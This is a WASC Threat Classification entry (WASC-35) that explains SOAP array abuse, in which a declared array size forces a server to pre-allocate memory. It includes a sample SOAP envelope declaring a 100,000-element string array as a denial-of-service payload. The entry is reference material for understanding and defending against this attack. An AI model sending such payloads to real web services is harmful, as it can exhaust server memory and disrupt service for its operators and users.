Project: WASC Threat Classification
Threat Type: Attack
Reference ID: WASC-35
SOAP Array Abuse
XML SOAP arrays are a common target for malicious abuse. SOAP arrays are defined as having a type of "SOAP-ENC:Array" or a type derived there from. SOAP arrays have one or more dimensions (rank) whose members are distinguished by ordinal position. An array value is represented as a series of elements reflecting the array, with members appearing in ascending ordinal sequence. For multi-dimensional arrays the dimension on the right side varies most rapidly. Each member element is named as an independent element. A web-service that expects an array can be the target of a XML DoS attack by forcing the SOAP server to build a huge array in the machine's memory, thus inflicting a DoS condition on the machine due to the memory pre-allocation.
An example of this is the "DoS attack using SOAP arrays":
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
<SOAP-ENV:Body>
<fn:PerformFunction xmlns:fn="foo">
<DataSet xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:string[100000]">
<item xsi:type="xsd:string">Data1</item>
<item xsi:type="xsd:string">Data2</item>
<item xsi:type="xsd:string">Data3</item>
</DataSet>
</fn:PerformFunction>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
References
W3C Simple Object Access Protocol (SOAP) Standard
[1] http://www.w3.org/TR/soap/
W3C Simple Object Access Protocol (SOAP) 1.1 - SOAP Arrays
[2] http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522
"Multiple Vendor SOAP server array DoS" (Mar 15 2004), Amit Klein
[3] http://www.securityfocus.com/archive/1/357436
The SOA/XML Threat Model and New XML/SOA/Web 2.0 Attacks & Threats (Defcon 15), Steve Orrin
[4] http://www.safesoa.org/data/dc-15-Orrin-v2.pdf
Comments (0)
You don't have permission to comment on this page.